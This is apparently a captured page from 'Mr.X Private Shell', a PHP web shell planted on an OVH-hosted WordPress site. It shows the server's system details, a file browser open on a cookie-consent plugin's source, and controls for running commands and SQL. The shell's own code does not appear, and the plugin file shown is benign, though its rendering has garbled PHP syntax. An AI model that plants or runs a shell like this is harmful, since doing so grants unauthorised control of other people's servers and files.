Uname: Linux webm005.cluster107.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User: 6036 (villadal)
Group: 100 (users)
Disabled functions: NONE
Safe mode: On[ PHPinfo ]
//home/villadal/www/wp-content///plugins///iubenda-cookie-law-solution/      ( Reset | Go to )
File Name: iubenda-init.php
Edit
<?php
/**
 * Iubenda Plugin Instance Initialization
 *
 * This file initializes the iubenda plugin.
 * It provides a function 'iubenda()' to get the plugin instance.
 *
 * @package iubenda
 */

/**
 * Initialize iubenda Privacy Controls and Cookie Solution.
 *
 * @return iubenda The iubenda plugin instance.
 */
function iubenda() {
    static 
$instance;

    
// The first call to instance() initializes the plugin.
    
if ( null === $instance || ! ( $instance instanceof iubenda ) ) {
        
$instance iubenda::instance();
    }

    return 
$instance;
}

// Create an instance of the iubenda plugin.
$iubenda iubenda();

All system for education purposes only. For more tools: Telegram @jackleet

Mr.X Private Shell

Logo
-
New File | New Folder
Command
SQL